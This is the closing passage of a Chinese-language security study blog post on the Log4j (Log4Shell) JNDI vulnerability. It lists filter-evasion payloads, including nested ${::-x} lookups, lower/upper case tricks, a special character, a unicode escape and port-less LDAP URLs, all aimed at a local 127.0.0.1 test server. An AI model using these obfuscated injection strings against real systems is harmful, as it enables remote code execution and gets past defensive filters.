<h4 id="1-多-绕过："><a href="#1-多-绕过：" class="headerlink" title="1)多${}绕过："></a>1)多${}绕过：</h4><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$&#123;$&#123;::-J&#125;ndi:ldap://127.0.0.1:7777/TestRef&#125;</span><br><span class="line">$&#123;$&#123;::-j&#125;$&#123;::-n&#125;$&#123;::-d&#125;$&#123;::-i&#125;:$&#123;::-l&#125;$&#123;::-d&#125;$&#123;::-a&#125;$&#123;::-p&#125;://127.0.0.1/TestRef&#125;</span><br><span class="line">$&#123;jndi:$&#123;lower:l&#125;$&#123;lower:d&#125;a$&#123;lower:p&#125;://127.0.0.1/TestRef&#125; #绕过ldap的过滤</span><br></pre></td></tr></table></figure>

<h4 id="2-大小写绕过："><a href="#2-大小写绕过：" class="headerlink" title="2)大小写绕过："></a>2)大小写绕过：</h4><p>因为前边在看resolver的时候看到了lower和upper，我们可以这样：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$&#123;$&#123;lower:JN&#125;di:ldap://127.0.0.1:7777/TestRef&#125;</span><br><span class="line">$&#123;$&#123;upper:jn&#125;DI:ldap://127.0.0.1:7777/TestRef&#125;</span><br></pre></td></tr></table></figure>

<p>大小写是无所谓的，因为在Interpolator类的lookup方法中会对截取到的字符全部小写化</p>
<h4 id="3-特殊字符绕过："><a href="#3-特殊字符绕过：" class="headerlink" title="3)特殊字符绕过："></a>3)特殊字符绕过：</h4><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$&#123;jnd$&#123;upper:ı&#125;:ldap://127.0.0.1:7777/TestRef&#125;</span><br></pre></td></tr></table></figure>

<h4 id="4-unicode绕过："><a href="#4-unicode绕过：" class="headerlink" title="4)unicode绕过："></a>4)unicode绕过：</h4><p>emm，本地的环境反正没过，不知道有没有用，先记下来：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$&#123;sys:\u006fs.name&#125;</span><br></pre></td></tr></table></figure>

<h4 id="5-不出现端口号："><a href="#5-不出现端口号：" class="headerlink" title="5)不出现端口号："></a>5)不出现端口号：</h4><p>注意此时需要ldap服务端口为389</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$&#123;jndi:ldap://127.0.0.1/TestRef&#125;</span><br><span class="line">$&#123;jndi:ldap://[127.0.0.1]/TestRef&#125;</span><br></pre></td></tr></table></figure>



<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>先写到这里吧，之后学到什么新的东西再往上添</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/04/18/NSSCTF%E9%9D%B6%E5%9C%BAJAVA%E9%A2%98%E5%85%A8%E8%A7%A3/" rel="prev" title="NSSCTF靶场JAVA题全解（未完待续）">
      <i class="fa fa-chevron-left"></i> NSSCTF靶场JAVA题全解（未完待续）
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/05/01/JAVA%E5%AE%89%E5%85%A8Weblogic%E4%B9%8BCVE-2015-4852%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" rel="next" title="JAVA安全:Weblogic之CVE-2015-4852反序列化漏洞">
      JAVA安全:Weblogic之CVE-2015-4852反序列化漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%AD%A3%E6%96%87"><span class="nav-number">2.</span> <span class="nav-text">正文</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">2.1.</span> <span class="nav-text">1.环境搭建</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">2.2.</span> <span class="nav-text">2.漏洞复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">2.3.</span> <span class="nav-text">3.漏洞分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-Bypass"><span class="nav-number">2.4.</span> <span class="nav-text">4.Bypass</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%A4%9A-%E7%BB%95%E8%BF%87%EF%BC%9A"><span class="nav-number">2.4.1.</span> <span class="nav-text">1)多${}绕过：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87%EF%BC%9A"><span class="nav-number">2.4.2.</span> <span class="nav-text">2)大小写绕过：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E7%89%B9%E6%AE%8A%E5%AD%97%E7%AC%A6%E7%BB%95%E8%BF%87%EF%BC%9A"><span class="nav-number">2.4.3.</span> <span class="nav-text">3)特殊字符绕过：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-unicode%E7%BB%95%E8%BF%87%EF%BC%9A"><span class="nav-number">2.4.4.</span> <span class="nav-text">4)unicode绕过：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-%E4%B8%8D%E5%87%BA%E7%8E%B0%E7%AB%AF%E5%8F%A3%E5%8F%B7%EF%BC%9A"><span class="nav-number">2.4.5.</span> <span class="nav-text">5)不出现端口号：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-number">3.</span> <span class="nav-text">小结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Narcher Alter</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Narcher Alter</span>
</div>
<!--
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>
-->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
